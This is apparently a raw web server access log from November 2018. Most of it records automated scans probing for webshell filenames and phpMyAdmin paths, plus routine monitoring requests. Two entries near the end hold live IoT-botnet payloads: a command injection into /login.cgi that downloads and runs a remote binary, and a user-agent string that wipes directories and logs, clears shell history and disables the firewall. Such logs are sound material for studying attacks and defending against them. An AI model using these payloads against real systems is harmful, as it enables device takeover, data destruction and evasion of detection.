200.98.200.147 - - [01/Nov/2018:19:02:59 +0100] "POST /xxx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:00 +0100] "POST /92.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:00 +0100] "POST /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:00 +0100] "POST /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:00 +0100] "POST /dexgp.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:01 +0100] "POST /nuoxi.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:01 +0100] "POST /godkey.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:01 +0100] "POST /okokok.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:01 +0100] "POST /erwa.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:01 +0100] "POST /pma.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:02 +0100] "POST /ruyi.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:02 +0100] "POST /51314.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:02 +0100] "POST /5201314.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:03 +0100] "POST /fusheng.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:03 +0100] "POST /general.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:03 +0100] "POST /repeat.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:04 +0100] "POST /ldw.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:04 +0100] "POST /api.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:04 +0100] "POST /s1.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:04 +0100] "POST /xiaodai.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:05 +0100] "POST /hello.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:05 +0100] "POST /xp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:05 +0100] "POST /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:05 +0100] "POST /2.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:06 +0100] "POST /p.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:06 +0100] "POST /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:06 +0100] "POST /a.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:06 +0100] "POST /m.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:07 +0100] "POST /conf.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:07 +0100] "POST /123.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:07 +0100] "POST /HX.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:07 +0100] "POST /diy.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:08 +0100] "POST /666.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:08 +0100] "POST /777.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:08 +0100] "POST /qwq.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:08 +0100] "POST /.php HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:09 +0100] "POST /infos.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:09 +0100] "POST /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:09 +0100] "POST /htfr.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:09 +0100] "POST /zzk.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:10 +0100] "POST /xiaoma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:10 +0100] "POST /xiaomae.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:10 +0100] "POST /xiaomar.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:11 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:11 +0100] "POST /data.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:11 +0100] "POST /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:11 +0100] "POST /fack.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:12 +0100] "POST /angge.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
200.98.200.147 - - [01/Nov/2018:19:03:12 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:12 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:13 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:13 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:13 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:13 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:14 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:14 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:14 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:14 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:15 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:15 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:15 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:16 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:16 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:16 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:16 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:17 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:17 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:17 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:18 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:18 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:18 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:18 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:19 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:19 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:19 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:20 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:20 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:20 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:20 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:21 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:21 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:21 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:21 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:22 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:22 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:22 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:22 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:23 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Nov/2018:19:03:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.98.200.147 - - [01/Nov/2018:19:03:23 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:23 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:24 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:24 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:24 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:24 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:25 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:25 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:25 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:25 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:26 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:26 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
200.98.200.147 - - [01/Nov/2018:19:03:26 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Nov/2018:19:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:08:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:09:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:10:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.142.120.225 - - [01/Nov/2018:19:10:54 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
122.22.223.254 - - [01/Nov/2018:19:11:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
190.57.177.222 - - [01/Nov/2018:19:11:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2018:19:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:14:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:19:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
